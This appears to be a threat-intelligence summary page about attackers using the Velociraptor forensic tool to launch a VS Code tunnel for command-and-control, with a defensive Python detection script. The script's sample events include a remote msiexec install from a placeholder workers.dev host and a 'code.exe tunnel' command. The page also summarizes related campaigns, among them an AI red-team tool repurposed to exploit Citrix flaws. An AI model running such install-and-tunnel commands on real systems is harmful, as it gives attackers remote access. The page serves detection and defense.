Velociraptor Forensic Tool Abused for C2 Tunneling via Visual Studio Code
Summary
An unknown threat actor deployed the open-source Velociraptor forensic tool to download and execute Visual Studio Code, creating a tunnel to an attacker-controlled command-and-control (C2) server. The attack relied on legitimate software and built-in utilities, which minimized the need for custom malware. The chain began with the Windows msiexec utility downloading an MSI installer from a Cloudflare Workers domain; the MSI installed Velociraptor, which then contacted a second Cloudflare Workers domain to download and execute Visual Studio Code with its tunneling feature enabled, giving the attacker remote access to the host. Organizations are advised to monitor for unauthorized use of Velociraptor and to deploy endpoint detection and response (EDR) tooling, since this kind of living-off-the-land tradecraft can precede ransomware deployment.
Timeline
- 30.08.2025 15:06 · 1 article
Velociraptor Abused for C2 Tunneling via Visual Studio Code
Unknown threat actors deployed the Velociraptor forensic tool to download and execute Visual Studio Code, creating a tunnel to an attacker-controlled C2 server. The attack leveraged the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which then installed Velociraptor. This tool established contact with another Cloudflare Workers domain to download and execute Visual Studio Code with tunneling capabilities. The attack is part of a broader trend of abusing legitimate software for malicious purposes.
- Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling · thehackernews.com · 30.08.2025 15:06
Information Snippets
- Velociraptor, an open-source endpoint monitoring and digital forensic tool, was used by threat actors to deploy Visual Studio Code for C2 tunneling.
  First reported: 30.08.2025 15:06 · 1 source, 1 article
  - Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling · thehackernews.com · 30.08.2025 15:06
- The attack used the Windows msiexec utility to download an MSI installer directly from a Cloudflare Workers domain.
  First reported: 30.08.2025 15:06 · 1 source, 1 article
- The MSI file installed Velociraptor, which then established contact with another Cloudflare Workers domain to download and execute Visual Studio Code.
  First reported: 30.08.2025 15:06 · 1 source, 1 article
- Visual Studio Code was launched with its tunnel feature enabled, which exposes the host through a VS Code remote tunnel and gives the attacker remote access and remote code execution.
  First reported: 30.08.2025 15:06 · 1 source, 1 article
- The threat actors also used the msiexec utility to download additional payloads from the workers[.]dev domain.
  First reported: 30.08.2025 15:06 · 1 source, 1 article
- Organizations are advised to monitor for unauthorized use of Velociraptor and to implement endpoint detection and response systems.
  First reported: 30.08.2025 15:06 · 1 source, 1 article
- The attack is part of a broader trend of threat actors abusing legitimate software and tools for malicious purposes.
  First reported: 30.08.2025 15:06 · 1 source, 1 article
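The chain above (msiexec pulling an MSI over HTTPS, Velociraptor running outside the approved deployment path, VS Code started with the `tunnel` subcommand) can be expressed as process-lineage detection logic. The following is an added example written for this page; it is not code from The Hacker News, Sophos, or the Velociraptor project. The events are constructed to resemble Sysmon Event ID 1 fields, the workers.dev hostname is a placeholder rather than a real indicator, and the approved-parent list is an assumption you would replace with your own deployment's service path.

```python
"""Detect the msiexec -> Velociraptor -> VS Code tunnel chain in process events.

Added example for illustration. Event fields mimic Sysmon Event ID 1 (process
creation) in simplified form; all sample data below is constructed.
"""
import re
from dataclasses import dataclass

# Parents from which a *legitimately* deployed Velociraptor client may start.
# Assumption for this example (a service started by the SCM); adjust to match
# how your organisation actually deploys the agent.
APPROVED_VELOCIRAPTOR_PARENTS = {r"c:\windows\system32\services.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# msiexec switches that install or apply a package: /i, /package, /a
MSI_INSTALL_SWITCH_RE = re.compile(r"(?:^|\s)[/-](?:i|package|a)\b", re.IGNORECASE)
VELOCIRAPTOR_RE = re.compile(r"velociraptor", re.IGNORECASE)
# 'tunnel' as a standalone argument after the image path
VSCODE_TUNNEL_RE = re.compile(r"(?:^|\s)tunnel(?:\s|$)", re.IGNORECASE)
VSCODE_IMAGES = {"code.exe", "code-tunnel.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str


def _base(image: str) -> str:
    """Lower-cased file name of an image path (handles / and \\ separators)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_msi_install(ev: ProcEvent) -> bool:
    """msiexec installing a package fetched over HTTP(S) rather than from disk."""
    return (_base(ev.image) == "msiexec.exe"
            and bool(MSI_INSTALL_SWITCH_RE.search(ev.command_line))
            and bool(URL_RE.search(ev.command_line)))


def unauthorised_velociraptor(ev: ProcEvent) -> bool:
    """A Velociraptor binary started by something other than an approved parent."""
    looks_like_vr = bool(VELOCIRAPTOR_RE.search(_base(ev.image))) or \
        bool(VELOCIRAPTOR_RE.search(ev.command_line))
    return looks_like_vr and ev.parent_image.lower() not in APPROVED_VELOCIRAPTOR_PARENTS


def vscode_tunnel(ev: ProcEvent) -> bool:
    """VS Code launched with the 'tunnel' subcommand (Remote Tunnels feature)."""
    return _base(ev.image) in VSCODE_IMAGES and bool(VSCODE_TUNNEL_RE.search(ev.command_line))


RULES = (("remote_msi_install", remote_msi_install),
         ("unauthorised_velociraptor", unauthorised_velociraptor),
         ("vscode_tunnel", vscode_tunnel))


def _ancestors(ev: ProcEvent, by_pid: dict, max_depth: int = 6):
    """Walk parent links upward; bounded because real trees can be deep or cyclic."""
    cur, depth = by_pid.get(ev.parent_pid), 0
    while cur is not None and depth < max_depth:
        yield cur
        cur, depth = by_pid.get(cur.parent_pid), depth + 1


def evaluate(events: list) -> dict:
    """Return {rule: [pids]} for each single-event rule, plus 'chain' for a VS Code
    tunnel whose ancestry contains an unauthorised Velociraptor that itself
    descends from a remote msiexec install (intermediate cmd/services hops tolerated)."""
    hits = {name: [ev.pid for ev in events if fn(ev)] for name, fn in RULES}
    by_pid = {ev.pid: ev for ev in events}
    chain = []
    for ev in events:
        if not vscode_tunnel(ev):
            continue
        seen_vr = False
        for anc in _ancestors(ev, by_pid):
            if unauthorised_velociraptor(anc):
                seen_vr = True
            elif seen_vr and remote_msi_install(anc):
                chain.append(ev.pid)
                break
    hits["chain"] = chain
    return hits


# Constructed sample telemetry: one malicious chain plus three benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent(1001, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i https://example-installer.workers.dev/v.msi /qn",
              900, r"C:\Windows\System32\cmd.exe"),
    ProcEvent(1002, r"C:\Program Files\Velociraptor\Velociraptor.exe",
              r'"C:\Program Files\Velociraptor\Velociraptor.exe" --config client.config.yaml client',
              1001, r"C:\Windows\System32\msiexec.exe"),
    ProcEvent(1003, r"C:\Users\Public\code\code.exe",
              r'"C:\Users\Public\code\code.exe" tunnel --accept-server-license-terms --name ws01',
              1002, r"C:\Program Files\Velociraptor\Velociraptor.exe"),
    ProcEvent(2001, r"C:\Windows\System32\msiexec.exe",          # benign: local MSI via SCCM
              r"msiexec.exe /i C:\Windows\ccmcache\app.msi /qn",
              2000, r"C:\Windows\CCM\CcmExec.exe"),
    ProcEvent(2002, r"C:\Program Files\Velociraptor\Velociraptor.exe",  # benign: approved service
              r'"C:\Program Files\Velociraptor\Velociraptor.exe" service run',
              4, r"C:\Windows\System32\services.exe"),
    ProcEvent(2003, r"C:\Program Files\Microsoft VS Code\Code.exe",   # benign: developer use
              r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\src\proj',
              1500, r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule, pids in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule:26s} -> {pids}")
```

Each single-event rule is noisy on its own (remote MSI installs and VS Code tunnels both have legitimate uses), so the `chain` correlation is the alert worth paging on; the individual hits are better suited to hunting queries or low-severity enrichment.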
Similar Happenings
MostereRAT Malware Disables Security Tools, Targets Japanese Windows Users
A new malware campaign, tracked as MostereRAT, targets Japanese Windows users with sophisticated evasion techniques. MostereRAT disables antivirus and endpoint defenses, is written in the obscure Easy Programming Language (EPL) to hinder analysis, and abuses legitimate remote access tools (AnyDesk, TigerVNC, and TightVNC) to maintain persistent control over compromised systems while blending in with normal administration. The malware uses Windows Filtering Platform (WFP) filters to block security telemetry from leaving the host, secures its command-and-control (C2) communications with mutual TLS (mTLS), and can run as TrustedInstaller, a built-in Windows account with elevated permissions. Its capabilities include privilege escalation, keylogging, data exfiltration, the creation of hidden administrator accounts, facilitating RDP logins, and monitoring foreground window activity associated with Qianniu, Alibaba's seller tool. The campaign's long-term objectives and the full extent of its impact remain unclear. It highlights the value of removing local administrator privileges and blocking unapproved remote access tools to reduce the attack surface.
APT28 deploys NotDoor backdoor via Microsoft Outlook
APT28, a Russian state-sponsored threat group, has been using a new backdoor called NotDoor that turns Microsoft Outlook into a covert channel for communication, data exfiltration, and malware delivery. NotDoor is a VBA macro that monitors incoming emails for specific trigger words; when triggered, it lets attackers exfiltrate data, upload files, and execute commands on the victim's computer. It is delivered by DLL side-loading through a legitimate signed binary, Microsoft's OneDrive.exe. The backdoor was identified by researchers from Lab52, the threat intelligence arm of Spanish cybersecurity firm S2 Grupo, and has been deployed against companies in NATO member countries using techniques designed to evade detection and maintain persistence. NotDoor supports multiple commands for data exfiltration and file upload and uses Base64-encoded PowerShell commands for various operations. It creates a staging folder in the %TEMP% directory to store files, applies a custom encoding scheme to them, and sends them out via email. APT28's attacks also abuse Microsoft Dev Tunnels for C2 infrastructure, providing stealth and rapid infrastructure rotation, and use bogus Cloudflare Workers domains to distribute additional payloads, demonstrating a high level of specialized design and obfuscation.
HexStrike AI Exploits Citrix Vulnerabilities Disclosed in August 2025
Threat actors have begun using HexStrike AI to exploit Citrix vulnerabilities disclosed in August 2025. HexStrike AI, an AI-driven security platform, was designed to automate reconnaissance and vulnerability discovery for authorized red teaming, but it has been repurposed for malicious activity. The exploitation attempts target three Citrix vulnerabilities, and some threat actors are offering access to vulnerable NetScaler instances for sale on darknet forums. The use of HexStrike AI significantly shortens the window between vulnerability disclosure and exploitation, and its automation allows continuous exploitation attempts, increasing the likelihood of successful breaches. Security experts emphasize the urgency of patching and hardening affected systems. HexStrike AI's client includes retry logic and recovery handling so that a failure in any individual step does not derail its multi-stage operations. The tool has been open source on GitHub for about a month and has already garnered 1,800 stars and over 400 forks; hackers began discussing it on forums within hours of the Citrix disclosures. It has been used to automate the full exploitation chain, including scanning for vulnerable instances, crafting exploits, delivering payloads, and maintaining persistence. Check Point recommends that defenders focus on early warning through threat intelligence, AI-driven defenses, and adaptive detection.